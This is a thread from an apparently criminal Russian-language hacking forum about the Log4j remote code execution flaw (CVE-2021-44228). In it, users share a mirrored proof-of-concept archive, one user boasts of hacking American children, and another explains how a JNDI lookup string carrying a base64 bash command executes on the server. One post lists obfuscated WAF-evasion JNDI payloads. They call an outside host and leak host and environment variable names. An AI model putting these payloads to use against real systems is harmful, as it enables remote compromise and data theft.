• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote CVE-2021-44228 Apache log4j RCE

Lipshitz

(L3) cache
Пользователь
Регистрация
26.11.2021
Сообщения
221
Реакции
114
I started seeing posts about Minecraft servers vulnerable to rce but as time went on it was revealed that many versions of Apache are affected. This is similar to the bug that produced the Equifax 2017 data breach.

Also, there are many poc available on GitHub for those interested in playing around.
 
Пожалуйста, обратите внимание, что пользователь заблокирован

Вложения

  • apache-log4j-rce-poc-master.zip
    3.4 КБ · Просмотры: 85
Пожалуйста, обратите внимание, что пользователь заблокирован
Im dropping zip file with a git clone from https://github.com/xiajun325/apache-log4j-rce-poc wich is a fork from https://github.com/udoless/apache-log4j-rce-poc
Because they are getting deleted by github currently, so dropping it here just in case it's down when you'ill want to download.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
бедные дети играющие в майнкрафт на джаве
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Я повзламывал амерских детей, и.. почему у них так много порносайтов в куки
 
Так это затрагивает не только майнкрафт, к счастью. :)
Этот эксплоит позволяет выполнять подключение к произвольному ldap серверу, адрес которого записан в формате jndi: … А если в адрес сервера записать в base64 команду на bash, например, то при сохранении строки в лог эта команда будет выполнена от имени пользователя, от которого запущен сервис.
Ну и CF уже паникует:
blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
 
Пожалуйста, обратите внимание, что пользователь заблокирован
So could someone explain to me what's this vuld about? I Know it's critical and super bad to most people running Apache2 but what does it even do? Anyone have a PoC Video Yet?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх